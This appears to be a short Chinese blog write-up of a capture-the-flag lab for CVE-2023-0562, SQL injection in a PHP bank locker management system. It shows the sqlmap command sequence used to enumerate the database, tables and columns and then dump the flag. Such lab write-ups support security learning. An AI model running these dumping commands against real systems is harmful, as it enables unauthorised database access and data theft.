春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
2601_962364973 小时前
Windows Hello VS 传统密码:身份认证安全层级全面对比分析
windows·安全·电脑
2601_957174657 小时前
零基础学网络安全能学好吗
安全·web安全
aaPIXa6227 小时前
C++ 用 13 条规则让模型写出安全现代 C++
java·c++·安全
m0_7381207210 小时前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
m0_7381207212 小时前
PHP代码审计基础——面向对象(四)
android·开发语言·网络·安全·github·php
带娃的IT创业者13 小时前
监控并非安全:当隐私成为技术的祭品
java·开发语言·安全·数据安全·监控·隐私保护·加密技术
MartinYeung513 小时前
[论文学习]LLM-based AI Agent 安全威胁与防御系统性综述
人工智能·学习·安全
不会C语言的男孩15 小时前
TCP通信可视化工具,含下载地址
服务器·网络·安全
智脑API平台15 小时前
Codex Sandbox 和 Approval 怎么设置?文件权限、网络访问和安全边界说明
安全·sandbox·approval
遇码16 小时前
开源 Data Agent 实战:用 Lakemind + DuckDB 让 LLM 安全分析本地数据
安全·开源